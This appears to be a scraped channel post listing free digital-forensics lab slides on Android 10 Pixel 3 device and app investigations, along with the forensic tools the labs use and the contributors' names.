(https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/2_Pixel3_Device_Investigation.pptx) 4M Lab 3 Pixel 3 System Setting (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/3_Pixel3_System_settings.pptx) 5M Lab 4 Overview: App Life Cycle (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/4_Overivew_App_Life_Cycle.pptx) 11M Lab 5.1.1 AOSP App Investigations: Messaging (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_1_AOSP_App_Investigations_Messaging.pptx) 4M Lab 5.1.2 AOSP App Investigations: Contacts (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_2_AOSP_App_Investigations_Contacts.pptx) 3M Lab 5.1.3 AOSP App Investigations: Calendar (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_1_GMS_App_Investigations_Messaging.pptx) 1M Lab 5.2.1 GMS App Investigations: Messaging (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx) 6M Lab 5.2.2 GMS App Investigations: Dialer (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx) 2M Lab 5.2.3 GMS App Investigations: Maps (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_3_GMS_App_Investigations_Maps.pptx) 8M Lab 5.2.4 GMS App Investigations: Photos (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_4_GMS_App_Investigations_Photos.pptx) 6M Lab 5.3.1 Third-Party App Investigations: Kik (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_1_Third_Party_App_Investigation_kik.pptx)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
digital-forensics-lab/1_tshark_forensics_Introduction.pptx at main · frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty - digital-forensics-lab/1_tshark_forensics_Introduction.pptx at main · frankwxu/digital-forensics-lab
4M Lab 5.3.2 Third-Party App Investigations: textnow (https://github.com/frankwxu/digital-forensics-lab/blob/main/5_3_2_Third_Party_App_Investigation%20_textnow.pptx) 1M Lab 5.3.3 Third-Party App Investigations: whatapp (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_3_Third_Party_App_Investigation_whatsapp.pptx) 3M Lab 6 Pixel 3 Rooting (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/6_Pixel3_rooting.pptx) 5M Tools Used ======== Name version vendor Wine 6.0 https://source.winehq.org/git/wine.git/ Vinetto 0.98 https://github.com/AtesComp/Vinetto imgclip 05.12.2017 https://github.com/Arthelon/imgclip Tree 06.01.2020 https://github.com/kddeisz/tree RegRipper 3.0 https://github.com/keydet89/RegRipper3.0 Windows-Prefetch-Parser 05.01.2016 https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git python-evtx 05.21.2020 https://github.com/williballenthin/python-evtx xmlstarlet 1.6.1 https://github.com/fishjam/xmlstarlet hivex 09.15.2020 https://github.com/libguestfs/hivex libesedb 01.01.2021 https://github.com/libyal/libesedb pasco-project 02.09.2017 https://annsli.github.io/pasco-project/ libpff 01.17.2021 https://github.com/libyal/libpff USN-Record-Carver 05.21.2017 https://github.com/PoorBillionaire/USN-Record-Carver USN-Journal-Parser 1212.2018 https://github.com/PoorBillionaire/USN-Journal-Parser JLECmd 1.4.0.0 https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip libnl-utils 3.2.27 https://packages.ubuntu.com/xenial/libs/libnl-utils time_decode 12.13.2020 https://github.com/digitalsleuth/time_decode analyzeMFT 2.0.4 https://github.com/dkovar/analyzeMFT libvshadow 12.20.2020 https://github.com/libyal/libvshadow recentfilecache-parser 02.13.2018 https://github.com/prolsen/recentfilecache-parser Contribution ============= Frank Xu Malcolm Hayward Richard (Max) Wheeless
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video